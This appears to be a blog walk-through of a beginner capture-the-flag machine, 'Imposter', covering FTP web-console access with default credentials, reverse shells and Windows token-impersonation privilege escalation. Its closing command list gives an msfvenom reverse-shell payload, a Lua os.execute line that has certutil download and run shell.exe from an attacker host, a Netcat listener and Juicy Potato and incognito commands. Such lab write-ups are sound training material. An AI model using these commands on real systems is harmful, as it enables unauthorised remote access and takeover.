Premise

In this walk-through, we demonstrated how to enumerate and exploit a vulnerable FTP server to gain remote access to the windows system. Then we did a privilege escalation through token impersonation.

Machine Name: Imposter

Difficulty: Beginner

Skills Learned

  • FTP exploitation
  • Windows Privilege Escalation
  • Token Impersonation with Metasploit

Scanning and Enumeration

I started with an Nmap scan to see what ports were open. The scan showed that the machine was running Windows Server 2008 R2 and had an FTP server on port 8080 with a web interface. I also saw that NetBIOS was enabled, which meant I could enumerate SMB clients.

Exploiting the FTP Server

I was able to log into the FTP server’s web interface using the default credentials admin/password. This is a common mistake that makes servers vulnerable. The web interface had an administration console that allowed me to execute Lua commands using OS.execute("command").

Getting a Reverse Shell

I explored a few different ways to get a reverse shell:

  • Payload Transfer: I created a Windows Meterpreter reverse TCP payload with msfvenom and transferred it to the target machine using certutil. Then, I set up a Netcat listener and executed the payload.
  • Netcat Download: Another option was to download Netcat directly to the target machine and use it to create a reverse shell.
  • Metasploit Web Delivery: I also used the exploit/multi/script/web_delivery module in Metasploit. This module generates a command that, when run on the target, delivers a payload and creates a session. Since I couldn’t copy and paste into the web interface, I had to type the command in manually.

Privilege Escalation

Once I had a shell, I used whoami /priv to check my privileges. I saw that I had the SeImpersonatePrivilege, which is a key vulnerability.

I tried using Juicy Potato to escalate my privileges by abusing this impersonation privilege. This involved downloading the Juicy Potato tool, transferring it to the target machine, and running it with a specific CLSID and a payload. I made a mistake at first and used the wrong CLSID, but I eventually figured it out.

As an alternative, I used the incognito module in Metasploit. This module let me list the available tokens and impersonate them. I used list_tokens -u to find the NT AUTHORITY\SYSTEM token and then impersonate_token "NT AUTHORITY\SYSTEM" to escalate my privileges.

In the end, I successfully escalated my privileges to NT AUTHORITY\SYSTEM using the incognito module. It’s important to remember that not all methods will work on every machine, so it’s good to have a few different options to try.

Technical Commands

Here are some of the commands I used in the video:

  • msfvenom:msfvenom -p windows/meterpreter/reverse_tcp lhost=<YOUR_IP> lport=4545 -f exe -o shell.exe
  • Lua Commands:Luaos.execute("cmd.exe /c certutil.exe -urlcache -f http://<YOUR_IP>:8000/shell.exe shell.exe") os.execute("cmd.exe /c shell.exe")
  • Netcat:nc -lvp 4545
  • Juicy Potato:JuicyPotato.exe -l 3344 -t * -p C:\Windows\System32\cmd.exe -c {CLS_ID}
  • incognito (Metasploit):list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM"

Video Walk-through

, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles